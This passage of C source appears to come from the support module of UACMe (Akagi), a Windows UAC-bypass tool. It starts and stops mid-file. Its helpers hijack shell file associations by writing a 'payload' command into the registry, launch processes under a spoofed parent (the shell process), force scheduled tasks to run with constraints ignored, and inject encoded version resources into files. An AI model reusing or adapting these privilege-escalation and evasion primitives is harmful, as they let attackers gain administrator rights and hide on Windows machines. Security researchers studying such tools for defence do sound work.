sizeof(WCHAR);\n\n if (ERROR_SUCCESS == RegSetValueEx(assocKey,\n TEXT(\"\"),\n 0,\n REG_SZ,\n (BYTE*)lpszPayload,\n (DWORD)sz))\n {\n ntStatus = STATUS_SUCCESS;\n }\n else {\n ntStatus = STATUS_REGISTRY_IO_FAILED;\n }\n\n RegCloseKey(assocKey);\n }\n else {\n ntStatus = STATUS_REGISTRY_IO_FAILED;\n }\n\n NtClose(classesKey);\n\n if (!NT_SUCCESS(ntStatus))\n return ntStatus;\n\n ntStatus = STATUS_UNSUCCESSFUL;\n\n //\n // Register protocol within the shell.\n //\n if (g_ctx->dwBuildNumber > NT_WIN10_20H2) {\n\n hr = UserAssocFunc->UserAssocSet2(UASET_PROGID,\n pszExt,\n pszProgId,\n 2);\n\n }\n else {\n\n switch (g_ctx->dwBuildNumber) {\n case NT_WIN10_19H1:\n case NT_WIN10_19H2:\n case NT_WIN10_REDSTONE5:\n\n hr = UserAssocFunc->UserAssocSet2(UASET_PROGID,\n pszExt,\n pszProgId,\n 2);\n\n break;\n\n default:\n\n hr = UserAssocFunc->UserAssocSet(UASET_PROGID,\n pszExt,\n pszProgId);\n\n break;\n }\n\n }\n\n if (SUCCEEDED(hr)) {\n ntStatus = STATUS_SUCCESS;\n }\n else if (hr == E_ACCESSDENIED) {\n ntStatus = STATUS_ACCESS_DENIED;\n }\n\n return ntStatus;\n}\n\n/*\n* supUnregisterShellAssocEx\n*\n* Purpose:\n*\n* Unregister and optionally remove shell protocol.\n*\n*/\nNTSTATUS supUnregisterShellAssocEx(\n _In_ BOOLEAN fResetOnly,\n _In_ LPCWSTR pszExt,\n _In_opt_ LPCWSTR pszProgId,\n _In_ USER_ASSOC_PTR* UserAssocFunc\n)\n{\n NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;\n HANDLE classesKey = NULL;\n HRESULT hr;\n\n if (UserAssocFunc == NULL)\n return STATUS_INVALID_PARAMETER_3;\n\n if (UserAssocFunc->Valid == FALSE)\n return STATUS_INVALID_PARAMETER_3;\n\n if (fResetOnly == FALSE) {\n ntStatus = supOpenClassesKey(NULL, &classesKey);\n if (!NT_SUCCESS(ntStatus))\n return ntStatus;\n }\n\n switch (g_ctx->dwBuildNumber) {\n case NT_WIN10_19H1:\n case NT_WIN10_19H2:\n\n hr = UserAssocFunc->UserAssocSet2(UASET_CLEAR,\n pszExt,\n NULL,\n 0);\n\n break;\n default:\n\n hr = UserAssocFunc->UserAssocSet(UASET_CLEAR,\n pszExt,\n NULL);\n\n break;\n }\n\n if (SUCCEEDED(hr))\n ntStatus = STATUS_SUCCESS;\n\n if (fResetOnly == FALSE) {\n if (pszProgId)\n supRegDeleteKeyRecursive(classesKey, pszProgId);\n supRegDeleteKeyRecursive(classesKey, pszExt);\n NtClose(classesKey);\n }\n\n return ntStatus;\n}\n\n/*\n* supUnregisterShellAssoc\n*\n* Purpose:\n*\n* Unregister and remove shell protocol.\n*\n*/\nNTSTATUS supUnregisterShellAssoc(\n _In_ LPCWSTR pszExt,\n _In_ LPCWSTR pszProgId,\n _In_ USER_ASSOC_PTR* UserAssocFunc\n)\n{\n return supUnregisterShellAssocEx(FALSE,\n pszExt,\n pszProgId,\n UserAssocFunc);\n}\n\n/*\n* supResetShellAssoc\n*\n* Purpose:\n*\n* Enable/disable explorer policies.\n*\n*/\nNTSTATUS supResetShellAssoc(\n _In_ LPCWSTR pszExt,\n _In_opt_ LPCWSTR pszProgId,\n _In_ USER_ASSOC_PTR* UserAssocFunc\n)\n{\n return supUnregisterShellAssocEx(TRUE,\n pszExt,\n pszProgId,\n UserAssocFunc);\n\n}\n\n/*\n* supStopTaskByName\n*\n* Purpose:\n*\n* Stop scheduled task by name.\n*\n*/\nBOOL supStopTaskByName(\n _In_ LPCWSTR TaskFolder,\n _In_ LPCWSTR TaskName\n)\n{\n BOOL bResult = FALSE;\n HRESULT hr;\n ITaskService* pService = NULL;\n ITaskFolder* pRootFolder = NULL;\n IRegisteredTask* pTask = NULL;\n TASK_STATE taskState;\n\n BSTR bstrTaskFolder = NULL;\n BSTR bstrTask = NULL;\n VARIANT varDummy;\n\n do {\n\n bstrTaskFolder = SysAllocString(TaskFolder);\n if (bstrTaskFolder == NULL)\n break;\n\n bstrTask = SysAllocString(TaskName);\n if (bstrTask == NULL)\n break;\n\n hr = CoCreateInstance(&CLSID_TaskScheduler,\n NULL,\n CLSCTX_INPROC_SERVER,\n &IID_ITaskService,\n (void**)&pService);\n\n if (FAILED(hr))\n break;\n\n VariantInit(&varDummy);\n\n hr = pService->lpVtbl->Connect(pService,\n varDummy,\n varDummy,\n varDummy,\n varDummy);\n\n if (FAILED(hr))\n break;\n\n hr = pService->lpVtbl->GetFolder(pService, bstrTaskFolder, &pRootFolder);\n if (FAILED(hr))\n break;\n\n hr = pRootFolder->lpVtbl->GetTask(pRootFolder, bstrTask, &pTask);\n if (FAILED(hr))\n break;\n\n hr = pTask->lpVtbl->get_State(pTask, &taskState);\n if (FAILED(hr))\n break;\n\n if (taskState == TASK_STATE_RUNNING) {\n hr = pTask->lpVtbl->Stop(pTask, 0);\n }\n\n bResult = SUCCEEDED(hr);\n\n } while (FALSE);\n\n if (bstrTaskFolder)\n SysFreeString(bstrTaskFolder);\n\n if (bstrTask)\n SysFreeString(bstrTask);\n\n if (pTask)\n pTask->lpVtbl->Release(pTask);\n\n if (pRootFolder)\n pRootFolder->lpVtbl->Release(pRootFolder);\n\n if (pService)\n pService->lpVtbl->Release(pService);\n\n return bResult;\n}\n\n/*\n* supPathAddBackSlash\n*\n* Purpose:\n*\n* Add trailing backslash to the path if it doesn't have one.\n*\n*/\nLPWSTR supPathAddBackSlash(\n _In_ LPWSTR lpszPath\n)\n{\n SIZE_T nLength;\n LPWSTR lpszEnd, lpszPrev, lpszResult = NULL;\n\n nLength = _strlen(lpszPath);\n\n if (nLength) {\n\n lpszEnd = lpszPath + nLength;\n\n if (lpszPath == lpszEnd)\n lpszPrev = lpszPath;\n else\n lpszPrev = (LPWSTR)lpszEnd - 1;\n\n if (*lpszPrev != TEXT('\\\\')) {\n *lpszEnd++ = TEXT('\\\\');\n *lpszEnd = TEXT('\\0');\n }\n\n lpszResult = lpszEnd;\n\n }\n\n return lpszResult;\n}\n\n/*\n* supOpenShellProcess\n*\n* Purpose:\n*\n* Return handle to shell process.\n*\n*/\nHANDLE supOpenShellProcess(\n _In_ ULONG dwDesiredAccess\n)\n{\n HWND hwndShell = GetShellWindow();\n ULONG processId = 0, desiredAccess = dwDesiredAccess;\n\n GetWindowThreadProcessId(hwndShell, &processId);\n if (processId) {\n\n if (!(desiredAccess & PROCESS_CREATE_PROCESS))\n desiredAccess |= PROCESS_CREATE_PROCESS;\n\n return OpenProcess(desiredAccess, FALSE, processId);\n\n }\n\n return NULL;\n}\n\n/*\n* supRunProcessFromParent\n*\n* Purpose:\n*\n* Start new process with given parent.\n*\n*/\nHANDLE supRunProcessFromParent(\n _In_ HANDLE hParentProcess,\n _Inout_opt_ LPWSTR lpApplicationName,\n _In_ LPWSTR lpszParameters,\n _In_opt_ LPWSTR lpCurrentDirectory,\n _In_ ULONG CreationFlags,\n _In_ WORD ShowWindowFlags,\n _Out_opt_ HANDLE* PrimaryThread\n)\n{\n BOOL bResult = FALSE;\n DWORD dwFlags = CreationFlags | CREATE_DEFAULT_ERROR_MODE | NORMAL_PRIORITY_CLASS;\n\n HANDLE hNewProcess = NULL;\n\n LPWSTR pszBuffer = NULL;\n SIZE_T size;\n STARTUPINFOEX si;\n PROCESS_INFORMATION pi;\n\n if (PrimaryThread)\n *PrimaryThread = NULL;\n\n RtlSecureZeroMemory(&pi, sizeof(pi));\n RtlSecureZeroMemory(&si, sizeof(si));\n\n size = (1 + _strlen(lpszParameters)) * sizeof(WCHAR);\n pszBuffer = (LPWSTR)supHeapAlloc(size);\n if (pszBuffer) {\n\n _strcpy(pszBuffer, lpszParameters);\n si.StartupInfo.cb = sizeof(STARTUPINFOEX);\n\n size = 0x30;\n\n do {\n if (size > 1024)\n break;\n\n si.lpAttributeList = supHeapAlloc(size);\n if (si.lpAttributeList) {\n\n if (InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size)) {\n if (UpdateProcThreadAttribute(si.lpAttributeList, 0,\n PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hParentProcess, sizeof(hParentProcess), 0, 0))\n {\n si.StartupInfo.dwFlags = STARTF_USESHOWWINDOW;\n si.StartupInfo.wShowWindow = ShowWindowFlags;\n\n bResult = CreateProcess(lpApplicationName,\n pszBuffer,\n NULL,\n NULL,\n FALSE,\n dwFlags | EXTENDED_STARTUPINFO_PRESENT,\n NULL,\n lpCurrentDirectory,\n (LPSTARTUPINFO)&si,\n &pi);\n\n if (bResult) {\n hNewProcess = pi.hProcess;\n if (PrimaryThread) {\n *PrimaryThread = pi.hThread;\n }\n else {\n CloseHandle(pi.hThread);\n }\n }\n\n }\n\n if (si.lpAttributeList)\n DeleteProcThreadAttributeList(si.lpAttributeList); //dumb empty routine\n\n }\n supHeapFree(si.lpAttributeList);\n }\n\n } while (GetLastError() == ERROR_INSUFFICIENT_BUFFER);\n\n supHeapFree(pszBuffer);\n }\n\n return hNewProcess;\n}\n\n/*\n* supCreateBindingHandle\n*\n* Purpose:\n*\n* Bind handle to the RPC interface.\n*\n*/\nRPC_STATUS supCreateBindingHandle(\n _In_ RPC_WSTR RpcInterfaceUuid,\n _Out_ RPC_BINDING_HANDLE* BindingHandle\n)\n{\n RPC_STATUS status = RPC_S_INTERNAL_ERROR;\n RPC_SECURITY_QOS_V3 sqos;\n RPC_WSTR StringBinding = NULL;\n RPC_BINDING_HANDLE Binding = NULL;\n PSID LocalSystemSid = NULL;\n DWORD cbSid = SECURITY_MAX_SID_SIZE;\n\n\n if (BindingHandle)\n *BindingHandle = NULL;\n\n RtlSecureZeroMemory(&sqos, sizeof(sqos));\n\n status = RpcStringBindingComposeW(RpcInterfaceUuid,\n TEXT(\"ncalrpc\"),\n NULL,\n NULL,\n NULL,\n &StringBinding);\n\n if (status == RPC_S_OK) {\n\n status = RpcBindingFromStringBindingW(StringBinding, &Binding);\n RpcStringFreeW(&StringBinding);\n\n if (status == RPC_S_OK) {\n\n LocalSystemSid = LocalAlloc(LPTR, cbSid);\n if (LocalSystemSid) {\n if (CreateWellKnownSid(WinLocalSystemSid, NULL, LocalSystemSid, &cbSid)) {\n\n sqos.Version = 3;\n sqos.ImpersonationType = RPC_C_IMP_LEVEL_IMPERSONATE;\n sqos.Capabilities = RPC_C_QOS_CAPABILITIES_MUTUAL_AUTH;\n sqos.IdentityTracking = 0;\n sqos.Sid = LocalSystemSid;\n\n status = RpcBindingSetAuthInfoExW(Binding,\n NULL,\n RPC_C_AUTHN_LEVEL_PKT_PRIVACY,\n RPC_C_AUTHN_WINNT,\n 0,\n 0,\n (RPC_SECURITY_QOS*)&sqos);\n\n if (status == RPC_S_OK) {\n *BindingHandle = Binding;\n Binding = NULL;\n }\n\n }\n else {\n status = GetLastError();\n }\n LocalFree(LocalSystemSid);\n }\n else {\n status = ERROR_NOT_ENOUGH_MEMORY;\n }\n }\n }\n\n if (Binding)\n RpcBindingFree(&Binding);\n\n return status;\n}\n\n/*\n* supConcatenatePaths\n*\n* Purpose:\n*\n* Concatenate 2 paths.\n*\n*/\nBOOL supConcatenatePaths(\n _Inout_ LPWSTR Target,\n _In_ LPCWSTR Path,\n _In_ SIZE_T TargetBufferSize\n)\n{\n SIZE_T TargetLength, PathLength;\n BOOL NeedSeparator;\n SIZE_T EndingLength;\n SIZE_T i;\n\n if (Target == NULL || Path == NULL || TargetBufferSize == 0)\n return FALSE;\n\n // Find current target length.\n TargetLength = 0;\n while (TargetLength < TargetBufferSize && Target[TargetLength] != 0)\n TargetLength++;\n\n if (TargetLength >= TargetBufferSize)\n return FALSE;\n\n // Strip trailing backslash from target, but preserve a lone backslash.\n if (TargetLength > 0 && Target[TargetLength - 1] == TEXT('\\\\')) {\n // Do not strip if the target is exactly a single backslash.\n if (!(TargetLength == 1 && Target[0] == TEXT('\\\\')))\n {\n TargetLength--;\n }\n }\n\n // Strip leading backslash from path only if target is non‑empty.\n if (TargetLength > 0 && Path[0] == TEXT('\\\\'))\n Path++;\n\n // Find path length (after possible stripping).\n PathLength = 0;\n while (Path[PathLength] != 0)\n PathLength++;\n\n // Determine if a separator is needed based on target's last character.\n NeedSeparator = (TargetLength > 0 && Target[TargetLength - 1] != TEXT('\\\\'));\n\n EndingLength = TargetLength + (NeedSeparator ? 1 : 0) + PathLength + 1;\n\n if (EndingLength > TargetBufferSize)\n return FALSE;\n\n // Insert separator if needed.\n if (NeedSeparator) {\n Target[TargetLength] = TEXT('\\\\');\n TargetLength++;\n }\n\n // Copy the path.\n for (i = 0; i < PathLength; i++)\n Target[TargetLength + i] = Path[i];\n\n Target[TargetLength + PathLength] = 0;\n return TRUE;\n}\n\n/*\n* supRemoveDirectoryRecursive\n*\n* Purpose:\n*\n* Recursively deletes the specified directory and all the files in it.\n*\n*/\nBOOL supRemoveDirectoryRecursive(\n _In_ LPCWSTR Path\n)\n{\n BOOL bFind = TRUE;\n BOOL Ret = TRUE;\n DWORD dwAttributes;\n HANDLE hFind;\n WCHAR szTemp[MAX_PATH + 1];\n WCHAR FindPath[MAX_PATH + 1];\n WIN32_FIND_DATA FindFileData;\n\n _strncpy(FindPath, MAX_PATH, Path, MAX_PATH);\n dwAttributes = GetFileAttributes(Path);\n\n if (dwAttributes & FILE_ATTRIBUTE_DIRECTORY) {\n supConcatenatePaths(FindPath, TEXT(\"*.*\"), MAX_PATH);\n }\n\n hFind = FindFirstFile(FindPath, &FindFileData);\n\n while (hFind != INVALID_HANDLE_VALUE && bFind != FALSE) {\n\n _strncpy(szTemp, MAX_PATH, Path, MAX_PATH);\n supConcatenatePaths(szTemp, FindFileData.cFileName, MAX_PATH);\n\n //\n // This is a directory, reenter.\n //\n if ((FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) &&\n (FindFileData.cFileName[0] != TEXT('.'))) {\n\n if (!supRemoveDirectoryRecursive(szTemp)) {\n\n Ret = FALSE;\n }\n\n RemoveDirectory(szTemp);\n }\n\n //\n // Remove file.\n //\n else if (!(FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) {\n\n DeleteFile(szTemp);\n }\n\n bFind = FindNextFile(hFind, &FindFileData);\n }\n\n FindClose(hFind);\n\n //\n // Remove the root directory.\n //\n dwAttributes = GetFileAttributes(Path);\n if (dwAttributes & FILE_ATTRIBUTE_DIRECTORY) {\n\n if (!RemoveDirectory(Path)) {\n\n Ret = FALSE;\n }\n }\n\n return Ret;\n}\n\n/*\n* supEnumProcessesForSession\n*\n* Purpose:\n*\n* Enumerate running processes in given session and run callback.\n*\n*/\nBOOL supEnumProcessesForSession(\n _In_ ULONG SessionId,\n _In_ pfnEnumProcessCallback Callback,\n _In_opt_ PVOID UserContext\n)\n{\n BOOL bStopEnumeration = FALSE;\n ULONG nextEntryDelta = 0;\n PVOID processList;\n\n union {\n PSYSTEM_PROCESS_INFORMATION Processes;\n PBYTE ListRef;\n } List;\n\n processList = supGetSystemInfo(SystemProcessInformation);\n if (processList) {\n\n List.ListRef = (PBYTE)processList;\n\n do {\n\n List.ListRef += nextEntryDelta;\n\n if (List.Processes->SessionId == SessionId) {\n\n bStopEnumeration = Callback(List.Processes, UserContext);\n if (bStopEnumeration)\n break;\n\n }\n\n nextEntryDelta = List.Processes->NextEntryDelta;\n\n } while (nextEntryDelta);\n\n supHeapFree(processList);\n\n }\n\n return bStopEnumeration;\n}\n\n/*\n* supEnableToastForProtocol\n*\n* Purpose:\n*\n* Enumerate registered prog id's for the given interface and enable/disable toast for them.\n*\n*/\nVOID supEnableToastForProtocol(\n _In_ LPCWSTR lpProtocol,\n _In_ BOOL fEnable\n)\n{\n HRESULT hr;\n DWORD celtFetched, dwValue;\n SIZE_T cbName;\n LPWSTR lpProgId, lpValue;\n IAssocHandler* assocHandler;\n IEnumAssocHandlers* enumHandlers = NULL;\n IObjectWithProgID* progId = NULL;\n\n if (FAILED(SHAssocEnumHandlersForProtocolByApplication(lpProtocol,\n &IID_IEnumAssocHandlers, (PVOID*)&enumHandlers)))\n {\n return;\n }\n\n do {\n celtFetched = 0;\n assocHandler = NULL;\n hr = enumHandlers->lpVtbl->Next(enumHandlers, 1, &assocHandler, &celtFetched);\n if (SUCCEEDED(hr) && celtFetched) {\n\n hr = assocHandler->lpVtbl->QueryInterface(assocHandler,\n &IID_IObjectWithProgID, (PVOID*)&progId);\n\n if (SUCCEEDED(hr)) {\n\n lpProgId = NULL;\n hr = progId->lpVtbl->GetProgID(progId, &lpProgId);\n if (SUCCEEDED(hr) && lpProgId) {\n\n cbName = (4 + _strlen(lpProtocol) +\n _strlen(lpProgId) + 1) * sizeof(WCHAR);\n lpValue = (LPWSTR)supHeapAlloc(cbName);\n if (lpValue) {\n\n _strcpy(lpValue, lpProgId);\n _strcat(lpValue, TEXT(\"_\"));\n _strcat(lpValue, lpProtocol);\n\n dwValue = fEnable;\n\n RegSetKeyValue(HKEY_CURRENT_USER,\n T_APP_ASSOC_TOASTS,\n lpValue,\n REG_DWORD,\n (LPCVOID)&dwValue,\n sizeof(DWORD));\n\n\n supHeapFree(lpValue);\n }\n CoTaskMemFree(lpProgId);\n }\n\n progId->lpVtbl->Release(progId);\n }\n\n assocHandler->lpVtbl->Release(assocHandler);\n }\n\n } while (celtFetched);\n\n enumHandlers->lpVtbl->Release(enumHandlers);\n\n}\n\n/*\n* supWaitForChildProcesses\n*\n* Purpose:\n*\n* Check for child instances of process with given name is running and wait some time.\n*\n*/\nULONG supWaitForChildProcesses(\n _In_ LPCWSTR lpProcessName,\n _In_ DWORD dwWaitMiliseconds\n)\n{\n BOOL bRetry;\n DWORD dwCreatorPid, dwSessionId, dummy, dwCurrentWait, dwMaxWait = dwWaitMiliseconds;\n PROCESS_BASIC_INFORMATION pbi;\n ULONG nextEntryDelta;\n PVOID processList;\n HANDLE hEnumProcess;\n OBJECT_ATTRIBUTES obja;\n CLIENT_ID cid;\n UNICODE_STRING lookupPsName;\n\n union {\n PSYSTEM_PROCESS_INFORMATION Processes;\n PBYTE ListRef;\n } List;\n\n dwCreatorPid = HandleToULong(NtCurrentTeb()->ClientId.UniqueProcess);\n dwSessionId = NtCurrentPeb()->SessionId;\n\n dwCurrentWait = 0;\n if (dwMaxWait < 1000) dwMaxWait = 1000;\n RtlSecureZeroMemory(&pbi, sizeof(pbi));\n RtlInitUnicodeString(&lookupPsName, lpProcessName);\n InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);\n\n do {\n\n bRetry = FALSE;\n\n processList = supGetSystemInfo(SystemProcessInformation);\n if (processList) {\n\n List.ListRef = (PBYTE)processList;\n nextEntryDelta = 0;\n\n do {\n\n List.ListRef += nextEntryDelta;\n\n if (List.Processes->SessionId == dwSessionId &&\n RtlEqualUnicodeString(&lookupPsName,\n &List.Processes->ImageName,\n TRUE))\n {\n\n hEnumProcess = NULL;\n cid.UniqueProcess = List.Processes->UniqueProcessId;\n cid.UniqueThread = NULL;\n\n if (NT_SUCCESS(NtOpenProcess(\n &hEnumProcess,\n PROCESS_QUERY_LIMITED_INFORMATION,\n &obja,\n &cid)))\n {\n if (NT_SUCCESS(NtQueryInformationProcess(hEnumProcess,\n ProcessBasicInformation,\n &pbi,\n sizeof(pbi),\n &dummy)))\n {\n bRetry = (pbi.InheritedFromUniqueProcessId == dwCreatorPid);\n }\n\n NtClose(hEnumProcess);\n }\n\n }\n\n if (bRetry)\n break;\n\n nextEntryDelta = List.Processes->NextEntryDelta;\n\n } while (nextEntryDelta);\n\n supHeapFree(processList);\n\n }\n else\n break;\n\n if (bRetry) {\n Sleep(1000);\n dwCurrentWait += 1000;\n }\n else \n break;\n\n } while (dwCurrentWait <= dwMaxWait);\n\n return dwCurrentWait;\n}\n\n/*\n* supRaiseHardError\n*\n* Purpose:\n*\n* Display UACMe hard error.\n*\n*/\nVOID supRaiseHardError(\n _In_ NTSTATUS HardErrorStatus\n)\n{\n ULONG dwFlags;\n HMODULE hModule = NULL;\n WCHAR errorBuffer[1024];\n\n UNICODE_STRING usText;\n ULONG_PTR params[] = { (ULONG_PTR)&usText };\n HARDERROR_RESPONSE heResponse;\n\n if (HRESULT_FACILITY(HardErrorStatus) == FACILITY_WIN32) {\n dwFlags = FORMAT_MESSAGE_IGNORE_INSERTS | FORMAT_MESSAGE_FROM_SYSTEM;\n }\n else {\n dwFlags = FORMAT_MESSAGE_IGNORE_INSERTS | FORMAT_MESSAGE_FROM_HMODULE;\n hModule = GetModuleHandle(RtlNtdllName);\n }\n\n errorBuffer[0] = 0;\n\n if (FormatMessage(dwFlags,\n hModule,\n HardErrorStatus,\n 0,\n errorBuffer,\n RTL_NUMBER_OF(errorBuffer),\n NULL))\n {\n RtlInitUnicodeString(&usText, errorBuffer);\n\n NtRaiseHardError(STATUS_FATAL_APP_EXIT | HARDERROR_OVERRIDE_ERRORMODE,\n RTL_NUMBER_OF(params),\n 1,\n (PULONG_PTR)params,\n OptionOk,\n (PULONG)&heResponse);\n }\n}\n\n/*\n* supGetThreadTokenImpersonationLevel\n*\n* Purpose:\n*\n* Query thread token impersonation level.\n*\n*/\nBOOL supGetThreadTokenImpersonationLevel(\n _In_ HANDLE ThreadHandle,\n _Out_ PSECURITY_IMPERSONATION_LEVEL ImpersonationLevel)\n{\n ULONG dummy;\n HANDLE hToken = NULL;\n SECURITY_IMPERSONATION_LEVEL level = SecurityAnonymous;\n NTSTATUS ntStatus;\n\n ntStatus = NtOpenThreadToken(ThreadHandle,\n MAXIMUM_ALLOWED,\n TRUE,\n &hToken);\n\n if (NT_SUCCESS(ntStatus)) {\n\n ntStatus = NtQueryInformationToken(hToken,\n TokenImpersonationLevel,\n (PVOID)&level,\n sizeof(SECURITY_IMPERSONATION_LEVEL),\n &dummy);\n\n NtClose(hToken);\n }\n\n *ImpersonationLevel = level;\n return NT_SUCCESS(ntStatus);\n}\n\n/*\n* supGetTickCount64\n*\n* Purpose:\n*\n* GetTickCount64 eqv.\n*\n*/\nULONGLONG supGetTickCount64(\n VOID\n)\n{\n ULARGE_INTEGER tickCount;\n\n#ifdef _WIN64\n\n tickCount.QuadPart = USER_SHARED_DATA->TickCountQuad;\n\n#else\n\n while (TRUE)\n {\n tickCount.HighPart = (ULONG)USER_SHARED_DATA->TickCount.High1Time;\n tickCount.LowPart = USER_SHARED_DATA->TickCount.LowPart;\n\n if (tickCount.HighPart == (ULONG)USER_SHARED_DATA->TickCount.High2Time)\n break;\n\n NtYieldExecution();\n }\n\n#endif\n\n return (UInt32x32To64(tickCount.LowPart, USER_SHARED_DATA->TickCountMultiplier) >> 24) +\n (UInt32x32To64(tickCount.HighPart, USER_SHARED_DATA->TickCountMultiplier) << 8);\n}\n\n/*\n* supxExamineTaskhost\n*\n* Purpose:\n*\n* Find all tasks registered with the host process and stop them.\n*\n*/\nBOOL supxExamineTaskhost(\n _In_ HANDLE UniqueProcessId\n)\n{\n HRESULT hr = E_FAIL;\n ULONG processId;\n LONG i, cTasks = 0;\n VARIANT varDummy, varIndex;\n ITaskService* pService = NULL;\n IRunningTaskCollection* pTasks = NULL;\n IRunningTask* pTask;\n TASK_STATE taskState = TASK_STATE_UNKNOWN;\n\n do {\n\n hr = CoCreateInstance(&CLSID_TaskScheduler,\n NULL,\n CLSCTX_INPROC_SERVER,\n &IID_ITaskService,\n (void**)&pService);\n\n HRESULT_BREAK_ON_FAILED(hr);\n\n VariantInit(&varDummy);\n\n hr = pService->lpVtbl->Connect(pService,\n varDummy,\n varDummy,\n varDummy,\n varDummy);\n\n HRESULT_BREAK_ON_FAILED(hr);\n\n hr = pService->lpVtbl->GetRunningTasks(pService,\n TASK_ENUM_HIDDEN,\n &pTasks);\n\n HRESULT_BREAK_ON_FAILED(hr);\n\n hr = pTasks->lpVtbl->get_Count(pTasks, &cTasks);\n\n HRESULT_BREAK_ON_FAILED(hr);\n\n varIndex.vt = VT_INT;\n\n for (i = 1; i <= cTasks; i++) {\n\n varIndex.lVal = i;\n\n hr = pTasks->lpVtbl->get_Item(pTasks, varIndex, &pTask);\n if (SUCCEEDED(hr)) {\n\n processId = 0;\n hr = pTask->lpVtbl->get_EnginePID(pTask, &processId);\n if (SUCCEEDED(hr) && processId == HandleToUlong(UniqueProcessId)) {\n\n hr = pTask->lpVtbl->get_State(pTask, &taskState);\n if (taskState == TASK_STATE_RUNNING) {\n hr = pTask->lpVtbl->Stop(pTask);\n }\n }\n pTask->lpVtbl->Release(pTask);\n }\n }\n\n\n } while (FALSE);\n\n if (pTasks)\n pTasks->lpVtbl->Release(pTasks);\n\n if (pService)\n pService->lpVtbl->Release(pService);\n\n return SUCCEEDED(hr);\n}\n\n/*\n* supEnumTaskhostTasksCallback\n*\n* Purpose:\n*\n* Callback for taskhost task enumeration.\n*\n*/\nBOOL CALLBACK supEnumTaskhostTasksCallback(\n _In_ PSYSTEM_PROCESS_INFORMATION ProcessEntry,\n _In_ PVOID UserContext\n)\n{\n PUNICODE_STRING targetProcess = (PUNICODE_STRING)UserContext;\n\n if (!RtlEqualUnicodeString(&ProcessEntry->ImageName, targetProcess, TRUE))\n return FALSE;\n\n supxExamineTaskhost(ProcessEntry->UniqueProcessId);\n\n return FALSE;\n}\n\n/*\n* supStartScheduledTask\n*\n* Purpose:\n*\n* Run target task as schtasks does.\n*\n*/\nBOOLEAN supStartScheduledTask(\n _In_ LPCWSTR lpTaskFolder,\n _In_ LPCWSTR lpTaskName\n)\n{\n HRESULT hr_init, hr = E_FAIL;\n ITaskService* pService = NULL;\n ITaskFolder* pRootFolder = NULL;\n IRegisteredTask* pTask = NULL;\n IRunningTask* pRunningTask = NULL;\n VARIANT var;\n\n BSTR bstrTaskFolder = NULL;\n BSTR bstrTask = NULL;\n\n hr_init = CoInitializeEx(NULL, COINIT_MULTITHREADED);\n\n do {\n\n bstrTaskFolder = SysAllocString(lpTaskFolder);\n if (bstrTaskFolder == NULL) {\n break;\n }\n\n bstrTask = SysAllocString(lpTaskName);\n if (bstrTask == NULL) {\n break;\n }\n\n hr = CoCreateInstance(&CLSID_TaskScheduler,\n NULL,\n CLSCTX_INPROC_SERVER,\n &IID_ITaskService,\n (void**)&pService);\n\n if (FAILED(hr)) {\n break;\n }\n\n var.vt = VT_NULL;\n\n hr = pService->lpVtbl->Connect(pService, var, var, var, var);\n if (FAILED(hr)) {\n break;\n }\n\n hr = pService->lpVtbl->GetFolder(pService, bstrTaskFolder, &pRootFolder);\n if (FAILED(hr)) {\n break;\n }\n\n hr = pRootFolder->lpVtbl->GetTask(pRootFolder, bstrTask, &pTask);\n if (FAILED(hr)) {\n break;\n }\n\n hr = pTask->lpVtbl->RunEx(pTask, var, TASK_RUN_IGNORE_CONSTRAINTS, 0, NULL, &pRunningTask);\n if (FAILED(hr)) {\n break;\n }\n\n } while (FALSE);\n\n if (bstrTaskFolder)\n SysFreeString(bstrTaskFolder);\n\n if (bstrTask)\n SysFreeString(bstrTask);\n\n if (pRunningTask) {\n pRunningTask->lpVtbl->Stop(pRunningTask);\n pRunningTask->lpVtbl->Release(pRunningTask);\n }\n\n if (pTask)\n pTask->lpVtbl->Release(pTask);\n\n if (pRootFolder)\n pRootFolder->lpVtbl->Release(pRootFolder);\n\n if (pService)\n pService->lpVtbl->Release(pService);\n\n if (SUCCEEDED(hr_init))\n CoUninitialize();\n\n return SUCCEEDED(hr);\n}\n\n/*\n* supReplaceVersionInfo\n*\n* Purpose:\n*\n* Add a new VERSION_INFO block to the file.\n*\n*/\nBOOLEAN supReplaceVersionInfo(\n _In_ LPCWSTR lpFileName,\n _In_ PBYTE lpResource,\n _In_ DWORD dwResourceSize,\n _In_ DWORD dwKey\n)\n{\n BOOLEAN bResult = TRUE;\n HANDLE hUpdate;\n PVOID pvBuffer;\n SIZE_T bufferSize = ALIGN_UP_BY(dwResourceSize, PAGE_SIZE);\n\n do {\n pvBuffer = supVirtualAlloc(&bufferSize, DEFAULT_ALLOCATION_TYPE | MEM_TOP_DOWN, DEFAULT_PROTECT_TYPE, NULL);\n if (pvBuffer == NULL) {\n bResult = FALSE;\n break;\n }\n\n RtlCopyMemory(pvBuffer, lpResource, dwResourceSize);\n EncodeBuffer(pvBuffer, dwResourceSize, dwKey);\n\n hUpdate = BeginUpdateResource(lpFileName, FALSE);\n if (hUpdate == NULL) {\n bResult = FALSE;\n break;\n }\n\n if (!UpdateResource(hUpdate, RT_VERSION, MAKEINTRESOURCEW(1), \n MAKELANGID(LANG_ENGLISH, SUBLANG_ENGLISH_US),\n pvBuffer, dwResourceSize))\n {\n EndUpdateResource(hUpdate, TRUE);\n break;\n }\n\n EndUpdateResource(hUpdate, FALSE);\n\n } while (FALSE);\n\n if (pvBuffer)\n supSecureVirtualFree(pvBuffer, bufferSize, NULL);\n\n return bResult;\n}\n"
},
{
"path": "Source/Akagi/sup.h",
